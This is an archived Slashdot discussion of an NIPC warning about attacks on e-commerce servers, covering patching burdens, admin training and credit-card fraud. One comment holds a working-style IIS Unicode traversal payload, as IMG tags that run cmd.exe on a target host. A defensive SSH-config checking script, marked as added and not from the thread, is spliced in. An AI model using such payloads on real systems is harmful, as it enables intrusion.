NIPC Warns Of E-Commerce Vulnerabilities
SueZVudu writes: "In an announcement yesterday, the National Infrastructure Protection Center said that there has been an increase in hacker activity aimed at US e-commerce sites. They're mainly exploiting three known vulnerabilities in Windows NT systems, but Unix systems have been targeted as well. Basically, they point out the holes in Microsoft's SQL system and warn that such attacks are on the rise. You can see the story here." There've been a number of stories like this lately -- not just Microsoft, but the number of attacks is continuing to rise, and some people have been talking about more CERTs regarding "super" DDOS attacks.
standard cc verification is a built-in exploit (Score:3)
a) a name
b) a credit card number
c) a zip code
And that's all - your transaction will be authorized. Whoever thought up this system should be awarded with the "I killed e-commerce" trophy.
I run a free email service in Southeast Asia. Anyway, every once in a while we get complaints from some disgruntled person in the states about how one of our accounts is using their cc number. Generally, when this happens, we check the account, and usually we find a trail of purchases, along with the names and addresses to which the products were sent. We immediately lock the account.
Then we try to figure out what to do next. Our choices:
1. Alert the FBI? Un/fortunately the FBI has no jurisdiction here. They can't do anything.
2. Alert the local authorities? Well, there is _no_ law in this country. None whatsoever, sadly. And in a case like this, which would require some technical intelligence on their part, the local police would get so confused that they would probably throw us in jail. I'm not exaggerating.
3. Archive the files and wait. Yep.
An estimated 80% of the cc transactions originating in this country are with stolen cc numbers. So, if you have online cc processing on your site, MAKE SURE you block any requests originating with 202.* Of course, experienced kiddiez can use proxy servers, but you'll cut down the percentage.
A friend of mine has an online gift shop, and fake orders were sent through his system for weeks. Every request which is _verified_ by the cc authority and later cancelled cost him $5. He tried to notify the bank where the stolen numbers were coming from and got no response - they didn't care. Why should they, they were making $5 on every fraudulent transaction.
e-commerce sites are going to get killed by this when more unscrupulous people figure out how easy it is to order goods over the internet. as i said, all it takes is a name, a cc number, and a zip code.
It's the time of year... (Score:1)
I think it's going to be rough sailing 'til around mid-January.
- Eric
Re:Increasing problems... (Score:1)
Half truth (Score:2)
Yes, the admin does make a difference. Yes, Linux can be cracked.
But the OS does make a difference as well. Some OSes are more vulnerable than others. There's a difference in how often vulnerabilities are found.
The article mentions three different vulnerabilities in Microsoft systems. All three are addressed by security bulletins in the Microsoft websites, so what's the problem? The biggest problem is not the existence of vulnerabilities by themselves, the problem is that Microsoft systems have so many different vulnerabilities that it's very hard for a system administrator to keep track of them all. Comparatively, there's much less need of "admin-hours" to keep track and eliminate Unix vulnerabilities.
Another factor that contributes to this problem is that Microsoft systems are designed to be easy to configure and use by people with minimum training. This means that a Microsoft admin is more likely than a Unix admin to be less than optimally trained for the job. The typical "cracked Linux box" is a home computer connected to a broadband internet connection. These can be dangerous, if they are used for DoS attacks, for instance, but they usually don't have large databases of customer credit card numbers.
Linux distributors are all working on easier installations, but it still takes a lot more administrator training to set up an e-commerce site on Linux than on MS. So, overall, I would say the security problem mentioned in the article comes both from intrinsic OS problems and insufficiently trained or careless system administrators.
Re:Old issue (Score:1)
It would be cool if the hacker included the fix ! (Score:1)
That would make quite an improvement in "hacker ethics".
Brainstorming mode: there might even be a way to talk yourself out of legal prosecution if you do it this way, since you could claim that these security holes could be used to D(istributed)DoS your system, and you are just fixing them "in hot pursuit" :-P
Re:Hello Mr Sysadmin (Score:2)
As a part-time NT administrator, yes, it is hard to keep up with the patches on NT.
Service packs are easy to apply, they are not the problem. Someone hands you an unpatched NT box, what do you do? Assuming that you subscribe to the Microsoft Product Security Notification Service, you have to read a huge number of security bulletins. By my count, 60 bulletins from 1999 and 93 bulletins from 2000. For each one of these bulletins, you have to figure out if they are applicable to your system, and if so, download and apply a patch. This is a lot of work and can be confusing. For many NT system administrators, system administration is not their primary job, they are programmers or engineers. The security mailing lists are an even bigger time sink. They are high volume lists with a low signal-to-noise ratio.
Re:Increasing problems... (Score:1)
Not always the sites' fault! (Score:2)
--
"Give him head?" [pdqsolutions.com]
Re:I see a different trend... (Score:3)
Actually, I hate to admin the truth to this one, and I wish I had some moderator points to up this one some.
What makes this worse though isn't just the MCSE process. It's the age discrimination that does occur to a great degree on 30-35 year old IT workers. You take your most experienced group and disregard them as "too old" or "too expensive" in favor of the more hours-flexible, inexpensive (generally), and inexperienced. Of course we're going to have these problems. This just doesn't happen in most other job arenas.
Oh well, enough ranting for me, these problems should resolve themselves somewhat when the job market corrects itself to some extent.
Re:Old issue (Score:1)
<html>
<head>
<title> Thanks for cracking your webserver for me! </title>
</head>
<body>
<IMG SRC="http://www.victimhost.com/scripts/..%c1%9c..
y+..\..\winnt\system32\cmd.exe+cmd1.exe">
<IMG SRC="http://www.victimhost.com/scripts/..%c1%9c..
cho+YOU_ARE_CRACKED+>YOU_ARE_CRACKED&dir&am p;type+YOU_ARE_CRACKED">
</body>
</html>
Of course, this is a bit garbled, but the point is clear.
Re:standard cc verification is a built-in exploit (Score:1)
Where IS geographical location)?
--
If the good lord had meant me to live in Los Angeles
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Any GOOD Apple ][ was hacked to support Applesoft (][+) and a 'cracking rom', one that takes the NMI and re-directs it to your ROM. (normally you take out the cassette interface)
Re:We all knew this would happen. (Score:2)
2. "Run by the geeks"? Oh, so Dalvenjah has stopped his tyranny ("/akill * You all suck", anyone?)
People are over reacting. (Score:1)
One guy on the show (some FBI e-security expert) mentioned a very interesting fact: E-commerce is not new. The only thing "new" about it is the fact that you do it from the comfort of your own home.
He said that most people don't even realize that when they withdraw money off the ATM, or pay at the restaurant via credit or debit card, they're in fact using "e-commerce".
The only difference being that the banking networks are a bit more private. (Even that is changing, since more and more banks are using VPN's with strong crypto.)
The other thing worthy of mention from that show was that we're only seeing the tip of the iceberg. Banks and other institutions involved in e-commerce are reluctant to sound the alarm when it comes to fraud. They don't want to scare the average joe. This helps the criminal, since the other institutions are not warned when a new hole arises. If they would sound the alarm loud and fast, everyone else could patch up.
Summary: It's not any safer to have a clerk swipe your credit card in a machine than to type it yourself on the net. With the technique of skimming, actually, it's probably safer to type it up yourself on the net. [verifyfraud.com]
It's not just e-commerce (Score:1)
Re:Old issue (Score:1)
(sorry just testing)
Re:mod this up (Score:1)
Re:Prevention (Score:1)
Re:Reasons to worry (Score:1)
~cHris
--
Chris Naden
"Sometimes, home is just where you pour your coffee"
Re:Increasing problems... (Score:1)
Re:Who's casting the first stone? (Score:1)
The versions of Linux they tested were: "General Linux 2.0 kernel-based," Slackware 4.0, and Redhat 6.1 running 2.2.12. Definitely unusual!
From what I can gather, BindView notified Microsoft of the FINWAIT_1 problem in June and the ESTABLISHED problem in October. As for everyone else, BindView notified CERT of the ESTABLISHED problem in October and relied on CERT to notify EVERYONE ELSE!!!! The publication date of the advisory from CERT is November 30! The only part I am not *absolutely* sure about is whether BindView notified Microsoft directly in October--MS has a patch out for 95, 98, 98SE, ME, and NT4 and knowing MS's slow release time (it took them 6 months to fix the FINWAIT_1 problem) I tend to think MS had a headstart! If they did, then this is BULLS**T!!! This speaks volumes for releasing the exploit and notifying the vendor at the same time!
Congrats to BindView for finding this problem! BOO to BindView for screwing up on the notification! Next time, notify ALL the vendors you know are affected, not just MS!
Re:Increasing problems... (Score:1)
To me, this doesn't mean much in terms of who has the best OS but I just thought I'd put you straight.
Regards
WORD! (Score:3)
No that's no joke, but reality. They simply don't understand that if a server is behind a firewall but still connected to the internet, it still can be very vulnerable. So they don't see the need to apply all these patches and configuration settings.
I did the MCSE course myself a couple of years back, just to get that raise ;) and it's true: if you get the title you think you're AdminGod who knows everything. When you're then sent to a real life situation with servers running all kinds of weird software that affects your work but you don't know that software, you understand how that 16 year old kid must feel, you described perfectly.
I went back to programming right away... :) Much more fun. ;)
--
Re:Hello Mr Sysadmin (Score:1)
I know it is hard to administer a NT system.
What I wanted to point out is that a lot of people just take security too lightly. As you mention a lot of NT-Admins are not able to devote all or a lot of their time to administering.
Still I think it must be possible for a corp(I guess PHB are most to blame for a lot of this stuff) that relies heavily on their IT Infrastructure to pay someone(or even several people) to look after their servers. A security breach(even worse, a security breach that goes unnoticed, that's the real danger) can destroy a company that relies heavily on the web.
I didn't want to say administering NT itself is trivial, but rather that system security should be on the priority lists of everybody who relies on their servers and data.
It is necessary to educate people that they need to take strong security measures regarding their side just as they have to take care that there are virus scanners on the client machines.
Re:What MS needs is... (Score:1)
If they did create an auto scripting thingy (that's a scientific term BTW :) it would more than likely be an even bigger security risk than the bugs it would help to fix, just think, allowing an executable to be automatically run with a little calling card from Microsoft. That's the sort of thing that just cries "Take advantage of me"
Anyways, sorry for the rant
Da Cr33p
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
--
Re:Increasing problems... (Score:2)
<clue>
Forgive my bluntness, but is it really so bad? I run <lamer>RedHat</lamer>, and I find it very easy to stay on top of the worst exploits simply by subscribing to their mailing list. Whenever a patched component is available, I know it immediately simply by spotting the distinctive subject line in my inbox. It takes a few seconds to read the message, a few seconds to type in ncftpget whatever (fewer, if you use the <lamer>Netscape mail client</lamer> like me, and merely have to click the link), and a few seconds more to type rpm -Uhv whatever. If you're a pro, you can show your professionalism by dedicating a few extra minutes to reading up on what has actually been changed.
</clue>
Hardly a major challenge. It certainly beats applying a service pack and then trying to fix the resulting trainwreck; at least with Linux patches you can pick and choose your bugs.
All that to the side, I would say that maintaining system integrity is the primary responsibility of a "busy admin". Spend whatever time it takes to do it right. If your boss wants too many other things that distract from that fundamental responsibility, you should find another job while the economy's still hot.
--
Linux examples.... WAS Re:Hah! They deserve it! (Score:2)
Next time, if you are going to 'pick' on Unix, try using BSD as the basis of your attack. Oh, wait. That means you'd have to WORK to pick on Unix if you use BSD as the example. And your employer Micro$oft is paying you to worry about Linux...not BSD.
All 6 of your 'examples' are non-issues with BSD.
ftpd : The version of ftpd shipped with all versions of FreeBSD since 2.2.0 is not vulnerable to this problem
RPC : FreeBSD is not vulnerable to this problem.
Proper stack : FreeBSD-For a remote attacker, the scope of the attack is severely limited by the requirement to complete a TCP connection with the victim machine, meaning the IP address of the attacking machine is disclosed, and as such the attack can be effectively responded to through the use of tracing, filtering and legal mechanisms.
Kerberos : NetBSD-not-for-export "secr" sets are vulnerable to some of the problems cited in the advisory. (ahhh, them dangerous munitions)
BIND : All versions of FreeBSD after 4.0-RELEASE are not vulnerable to this bug
Netscape : no BSD mention
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
I'm proud to report that my Apple ][ still hasn't been hacked.
--
Re:Increasing problems... (Score:1)
Second: Linux is hardly ever specifically mentioned. Most security problems are application problems, not kernel problems and affect all *nixes. Linux kernel problems are as rare as Windows NT kernel problems.
Typically Win32 problems are with IIS, LanManager, IE and Office. Recent *nix problems have to do with apache/mysql, samba, bind, bash, ssh, identd etc. The only problems that haunt mostly the Windows OS are the Integration (and Visual Basic) related problems. Apparently that is just too complex to get secure. It's the fact that there is virtually no integration between most *nix applications that saves the *nix community from this *for now*.
Links: [Microsoft Security] [microsoft.com] [SecurityFocus] [securityfocus.com] [CERT] [cert.org]
--
Re:standard cc verification is a built-in exploit (Score:1)
__
Security awareness (Score:1)
People blame vulnerabilities in some products, in fact most of the problems may be caused by lack of awareness in computer security.
Businessmen rely on the ecommerce developers to deal with security, but their knowledge in such field may be very questionable.
Computer security, most likely, is not a mandatory subject of IT graduate, very high chance that a skillful programmer has no knowledge in security.
What's so bad about it? I've encountered three instances that explain everything:
1) I suggested to a team of web admins to separate the database system from the web server for security reasons. End up I'm considered by them as trouble-maker.
2) SSH, as we all know, has password and RSA authentication, the latter is supposed to be having higher security level than the former. A person installed both authentication methods because he wants to have high security of RSA and convenience of password auth. I asked him, why would a hacker bother to break your RSA while he could take an easy path to break your password authentication?
3) I tried to explain to my peers that brute force attack is possible so we must set some policies (expiration, length and format of password, etc.) to our password system. They laughed and said brute force attack is a joke because that'd generate a lot of log entries and there is a huge delay in login retry.....
I could go on. I found that most people do not bother to take too much time on security things but rather rely on the default security of the packages they used. E.g. RedHat has many security holes come with default installation, but since many people think Linux is secured, then RedHat is secured.
Just an example, I didn't say RedHat is bad. Many others might be worse.
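Added example, not part of the original thread: the second instance in the comment above (password login left enabled beside key authentication) can be checked mechanically. The sketch assumes current OpenSSH keyword names, uses constructed sample configs, ignores Match blocks, and treats keyboard-interactive as a password-style route (an assumption that holds for typical PAM setups).

```python
# Added example: report whether a password alone completes an SSH login
# even though public-key authentication is also offered.

# OpenSSH defaults for the keywords examined here.
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "authenticationmethods": "any",
}
# Deprecated spelling still found in older configs.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}


def effective_settings(config_text):
    """Global settings from sshd_config text; the first value per keyword wins."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break  # conditional overrides are out of scope for this sketch
        key = ALIASES.get(key, key)
        seen.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return {k: seen.get(k, default) for k, default in DEFAULTS.items()}


def single_factor_paths(settings):
    """Methods that, on their own, are sufficient to authenticate."""
    enabled = {
        "password": settings["passwordauthentication"].lower() == "yes",
        "publickey": settings["pubkeyauthentication"].lower() == "yes",
        "keyboard-interactive":
            settings["kbdinteractiveauthentication"].lower() == "yes",
    }
    methods = settings["authenticationmethods"].lower()
    if methods == "any":
        chains = [[name] for name in enabled]
    else:
        # Space-separated alternatives; commas join methods that are ALL required.
        chains = [chain.split(",") for chain in methods.split()]
    paths = set()
    for chain in chains:
        names = [m.split(":", 1)[0] for m in chain]  # drop ":pam"-style suffix
        if len(names) == 1 and enabled.get(names[0], False):
            paths.add(names[0])
    return sorted(paths)


def password_is_weakest_link(settings):
    """True when keys are offered but a password-style method also suffices."""
    paths = single_factor_paths(settings)
    return "publickey" in paths and any(
        p in paths for p in ("password", "keyboard-interactive"))


# Constructed sample configs.
MIXED = """
# keys for "security", passwords for "convenience"
PubkeyAuthentication yes
PasswordAuthentication yes
"""
KEY_ONLY = """
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
# the next line is ignored because the first value wins
PasswordAuthentication yes
"""
BOTH_REQUIRED = """
PasswordAuthentication yes
KbdInteractiveAuthentication no
AuthenticationMethods publickey,password
"""
EITHER = BOTH_REQUIRED.replace("publickey,password", "publickey password")

if __name__ == "__main__":
    for name, text in [("MIXED", MIXED), ("KEY_ONLY", KEY_ONLY),
                       ("BOTH_REQUIRED", BOTH_REQUIRED), ("EITHER", EITHER)]:
        s = effective_settings(text)
        print(name, single_factor_paths(s), password_is_weakest_link(s))
```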
"super" DDOS attacks (Score:3)
Something MUST be done about this!
Re:Hello Mr Sysadmin (Score:1)
Is patching really that hard?
It's very hard for a production system. Patching an NT system is even harder.
I could explain in detail, but rather I'll just give you examples.
I was asked to upgrade the patch from SP3 to SP4, on a Domino Lotus Notes server.
After the upgrade all users constantly received new message notifications but most were false alarms. We tried to upgrade (and even downgrade) the Domino Lotus Notes server in vain. We could do nothing else but downgrade the patch.
Unfortunately, the system couldn't restart after uninstalling the patch. Then we...(I skipped the sad ending here)
We learn from this story that patching an NT is very destructive, especially as we don't know what would be affected after the patch.
To be fair I'll give you another story in a similar situation caused by applying an 'application update' (aka patch, fixes, whatever) to a HP server.
It's the Y2K patch, along with all other 'application updates'. I'll cut the story short, our /var blew up - Downtime - we were blamed.
However, the difference in patching UNIX is that we could actually select a particular fix to apply. In NT we shall install the patch and pray.
I really wish NT worked well. To be honest I am not an anti-Microsoft, but I just wouldn't bet my career on it.
Re:standard cc verification is a built-in exploit (Score:1)
The entire concept is inherently insecure, whether it's stolen cards or stolen numbers. The problem with stolen numbers is that it can take longer before the cardholder knows it's missing and being used for nefarious purposes.
Re:"super" DDOS attacks (Score:1)
We all knew this would happen. (Score:3)
Consider the original IRC network, EFnet. It's essentially dead - completely unreliable and virtually impossible to connect to. Because of people DOSing the servers.
I liked the net a whole lot more when it was just us geeks.
What? Vulnerabilities in Windows and Unix? (Score:1)
I thought Windows was the only OS with vulnerabilities.
Guess not.
Re:Old issue (Score:1)
next time i'll read the article a bit more carefully
Okay, but will this problem ever go away? (Score:3)
I don't mean to be a pessimist, but it's inevitable that e-commerce will occasionally be subverted. It goes with the territory; we don't live in a perfect world and trying to make sure things always are secure is a waste of programming and marketing time.
Internet security paranoia has gone on for far too long, mostly because the mass media thrives off creating terrifying hoaxes to show on the 6-o'-clock news. (This in spite of a recent PC Data survey that showed e-commerce transactions are more likely to be legit than mail order ones.) At one time, e-commerce was somewhat insecure and unreliable. But those days are over; there's no reason someone should be biting their nails after ordering from Amazon.com or CDNow. It's time to stop perpetuating the cracker myth and put our efforts into actually building the next-generation e-commerce infrastructure.
How appropriate... (Score:3)
To get more information and potentially sign up, click here [securityfocus.com].
Increasing problems... (Score:1)
And Microsoft preaches on about how secure their software is.
The last time Linux was mentioned with some sort of security problem in the news was the prolin virus -- another Windows thing. How ironic.
Old issue (Score:5)
Hello Mr Sysadmin (Score:4)
Now unfortunately they don't mention which sites were affected and what the crackers actually did.
What I find really disturbing is the fact that for all of the 3 exploits (which are rather old) patches or configuration changes were available. So you can bash Microsoft to death here for letting such security holes happen but at least they patched it. The question is whether or not the patches were available before (I mean one of the holes was found in 99!)
Is it really that hard to patch your system regularly as a sysadmin? You are responsible for an e-commerce system and you don't find the time to patch your system? I guess most people don't even bother to read securityfocus [securtyfocus.com] or a similar resource or at least the MS security bulletins.
I guess a lot of corporations still think a security audit is some kind of luxury and even more don't seem to remember that it's not done with one check, security is something you have to take care of constantly.
And what are we going to see?
People talking about master "hackers". In those cases the measures to close those holes seem pretty trivial (if the patches were available on time, which you can't judge now).
Good luck finding investors... (Score:1)
Since when is the US Govt experts on Internet Security anyways? Hasn't every
BTW, how long until MS says to the Govt: "You let us operate the way we want and we'll include Carnivore in all of our programs"?
Bored, must sleep.
What MS needs is... (Score:4)
...a way to patch these holes automatically. Maybe they could develop a scripting language that could be run through an email client and then just mail the patch to everyone for auto-execution.
Re:What MS needs is... (Score:1)
I can see that happening with the sort of thing you're thinking of... way bad idea.
I mean, the only explanation for sysadmins not patching months- (in some cases years-) old holes and bugs are laziness or incompetence. Period. One more automated thing will make it that much easier for chimpanzees to run webservers -- and we don't want that, do we?
--
"Give him head?" [pdqsolutions.com]
Re:We all knew this would happen. (Score:1)
Re:Old issue (Score:1)
Actually I'd figure that an increase in illicit activity is precisely a call for caution. Unfortunately when it comes to IIS you don't have too many ways to ensure that the patches you have applied have actually fixed the problem or even that you haven't undone the patch by installing a further patch.
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Re:What? Vulnerabilities in Windows and Unix? (Score:1)
Re:Hello Mr Sysadmin (Score:1)
Also, the number of patches you need to apply is quite limited if you just apply the latest SP first (12 for Win2k with SP1), and patches are often named after the SP they will appear in. I would say: Piece of cake to keep those systems up-to-date. Only problem remaining is that MS insists on re-booting after every single applied patch. Then again, isn't that why god gave us perl for win32? ;-)
--
Re:Prevention (Score:1)
Many crackers do it for the kick. Part of the trick is not being caught. People capable of still causing real harm to online traders are amazingly good at that particular trick. Unlike (I imagine) real-life crimes, with online crimes you have an amazing amount of time to prepare properly and set-up your systems.
About registration, I bet they do... Problem with IPs is: A criminal who does not want to get linked to multiple attacks simply doesn't use the same car twice but just steals new number-plates or simply steals a car. Same holds for IP addresses. You just get a new one (one?) for every attack or use someone else's, and preferably never use your own.
--
Re:Increasing problems... (Score:2)
FP.
Re:Hello Mr Sysadmin (Score:1)
Re:I see a different trend... (Score:1)
In this position you're responsible for the bigger picture and the details like bugfix Q1238948 become harder to pay attention to -- you're in meetings, and you're chasing after the scumbags that work for you to get them to do the minimum of the job performance, all the while having to please a higher level of management with even less technology experience than your old boss whose job you now have.
I think it will take a serious collapse in the economy for the job market alone to correct this. We'll need to see a contraction of IT infrastructure (ie, less stuff to maintain and admin) for this to occur. I'm certainly not sold that a partial collapse of the dotcom world is enough -- plenty of dotcom people I've met are WORSE than standard issue corporate IT. They often strike me as the kinds of people with more interest in a technology lifestyle than in technology itself.
Re:Increasing problems... (Score:1)
I have to disagree. If you're a pro, you don't blindly apply patches to production systems the second you hear/read of their existence. Sane admins like to test the "fixes" on non-critical systems first and make sure that they both work and cause no additional harm. This slows down the process a bit but results in fewer mistakes.
Re:Hah! They deserve it! (Score:1)
same trend, different place. (Score:1)
All the same things can be said about the people who WRITE that software in the first place. Perma-temps, H1B slaves, and other people forced to work 80 hour weeks are not going to produce the best code in the world. Inexperience can be found where you look for it, but it's more important in Redmond.
Sure, it's possible to bone up OpenBSD, but they don't make the same kind of promises that MS does, and that's where these holes are. MS promises that their software is secure AND that MSCEs can run it in a secure fashion. They need to live up to both.
Re:standard cc verification is a built-in exploit (Score:1)
My bottom line improved DRAMATICALLY.
Some countries, I block, as much as I can, at the router level. Those countries include China, any Moslem country, all the Russian republics, any country which was once a Soviet satellite.
No way, no how, would I ever do this thing otherwise until credit card companies come up with a scheme that guarantees the authenticity of the card holder.
Ask yourself this: Why does paypal only accept American accounts? Do you think they're stupid?
Re:standard cc verification is a built-in exploit (Score:1)
Everything goes fine, I confirm my order of about $700. The next day, I get this mailed to the spam-bucket account I use for online transactions:
We have been unable to process your order because your billing and shipping information did not verify with the bank that issued the credit card you used to place your order.
As stated on our website, shipping and billing information, if different, must both be on file with the issuing financial institution.
Now this was a surprise to me because:
Meanwhile, it might be a good idea for those of you who have a problem with online credit card transactions bouncing who also ship physical product to addresses to check with the bank and implement these measures. If there's no way for a person to get your product to them, there is no reason for them to expose themselves to the risk of using the stolen number at your site.
Who's casting the first stone? (Score:1)
Many systems are vulnerable to this attack. Right now, Linux, the BSD's, and a number of other UNIX flavors appear vulnerable; see the statements from IBM, Compaq, and FreeBSD in the advisory.
Interestingly, MS says that Win2K is resistant to these attacks by design, though NT 4 has been patched. I wonder how they defend against an attack from multiple machines without refusing new connections or RST'ing the wrong ones? Similar recovery problems have already proven somewhat difficult in the context of handling local memory exhaustion attacks on Linux systems.
... (Score:1)
Why are they complaining?? (Score:3)
Re:Okay, but will this problem ever go away? (Score:1)
The real cost of all this... (Score:3)
The reason the Internet is such a great tool for communication, and also the reason that it is so easily abused, is that every node on the network is empowered. Everyone is able to send and receive at will, limited by the amount of bandwidth that they have. This is also its weakness, in that the model "trusts" its users not to abuse the system. Originally, when the network was all military and education, this was a reasonably safe assumption.
But we've seen what happens when everyone trusts everyone else. Someone comes along and abuses that trust - like the Morris worm in 1988. So we try and secure our individual sites, which means that administrators have to be smart and knowledgeable because the nature of the traffic coming to their sites is not predictable. And, as ever, if we can't protect ourselves, someone's going to want to jump in and do it for us.
My fear is that eventually the business side of the Net - its use as a money making tool - will overtake its other uses. That the "solution" to the problem of hacking and DDOSing will be to limit the traffic that flows through the network. That, essentially, the internet will turn into a giant content-delivery engine with just enough interactivity to allow you to Add Item to your Shopping Cart.
Of course, the fact that commercial sites use crummy, easily hacked software tends to push in favor of these sorts of limits. Almost makes you wonder if they're doing it on purpose...
Re:standard cc verification is a built-in exploit (Score:1)
Re:Increasing problems... (Score:1)
Anyway, my point, linux or windows or whatever OS you use doesn't make the difference in being secure. It's the admin who makes the difference.
Keep a close eye on your machines, update them whenever needed, keep in touch with the 'scene'.
I personally tend to be 'friends' with some of the more advanced scriptkiddies around, ok, they're mostly idiots who haven't got a clue, but they love to brag about their latest actions, and the latest exploits they have heard about... and if they know of any that affect you... you better start fixing
now... you can't get your machine to be 100% fool proof, but you can make it less inviting to script kiddies... use IDS, Firewalls, secure your machines, make sure that you log remotely, secure those logs,
Security is hard work
now this doesn't only show in security, mostly the entire infrastructure of e-commerce sites is CRAP to say the least.
mod this up (Score:1)
Under Windows you can run as many services as you like and even log in as administrator and the OS is still secure.
Windows virtual memory is an object, not a file and it has advanced security audits that make buffer overflows impossible.
Unix is so obsessed with compatibility that no one has ever really even bothered to write a protected memory buffer that is object oriented. Oh wait! C++ is for wussies in the unix world. It's just better to rewrite the wheel. So I guess it's impossible to write an NT style buffer object in Unix! At least desktops like gnome are written in c++. Oh ya. Whatever
Go 30 year technology!
Re:standard cc verification is a built-in exploit (Score:1)
Hey! All the IP addresses where I work start with 202, and I'm fairly sure that New Zealand isn't the country in Southeast Asia you're referring to. I don't think that IP address is a very good way of determining geographical location, and I don't think geographical location is a good way of determining guilt.
Re:We all knew this would happen. (Score:1)
One of the main reasons that EFNET is unused is because it has no chanserv/nickserv features and is therefore unusable, as it is far too easy to hack around with
Contrast this to DALnet, which has teams of volunteers patrolling it and features allowing reliable and secure operation of room and servers. Just because EFNET was there first doesn't mean it should be revered. DALnet is still very much run by the geeks (hence dal.net [dal.net] not dalnet.com, iyswim).
Like it or not, the web is a much bigger place than it used to be. This kind of harking back to "the good old days" won't help preserve the distributed, open and hackable (in the good sense) nature of this beast we created. If a service, site or protocol is unreliable and not very viable for its intended purpose, it will die, nostalgia or not. We can only hope this is totally true and MS doesn't prove the exception with SQL et al.
Ben^3
Bah Humbug (Score:1)
What was the propriety info that was downloaded? Was it info about the propriety of cracking e-commerce sites?
Also, the article goes on to cite three old Microsoft exploits. Where's the promised Unix vulnerability? I'm not saying Unix doesn't have exploits, only that this article says "Unix based operating systems have been victimized as well" and fails to explain.
Anyhow, I fail to see why this is a "National Infrastructure" issue. Some greedy fools slapped together a website with Microsoft "solutions" and got hacked. If customers care, the market will reward sites with better security. If customers don't care, why should the government?
I think this "nipc" is trying to create a pseudo-crisis to make themselves look relevant. Oldest trick in the governmental book.
Re:Who's casting the first stone? (Score:2)
From my experience of load testing NT4 boxes, it refuses new connections, basically.
Re:Hello Mr Sysadmin (Score:1)
I see a different trend... (Score:5)
Hear me out on this one.
The industry has been so cheapened by the fact that any yahoo that can read a book can pass an MCSE exam and get a 70k/yr job doing admin work on so-called "high-end" NT servers. When in reality this is like sending a kid who just got his driver's license at 16 to run the Indy 500. No driver's license or MCSE certificate can substitute for real world experience at the helm.
And that comes out over time when you have inexperienced people out there. Common, fairly simple bugs and holes which come about through the normal life of software, become more serious when you don't have people with experience to handle them properly and do simple things like, say, remove the default configuration on software that is wide open like wu-ftpd and IIS. (Not to pick on any OS in particular, there)
I think the NIPC warning just signifies from them what most of us (/.'ers and the like) have known for quite some time, that vulnerabilities are more serious when you don't have qualified people to take care of them
obviously (Score:1)
Re:What MS needs is... (Score:1)
Please install trojaniZed_update.yadda.yadda.yadda.tar.gz
it fixes a really nasty exploit.
Have a nice day.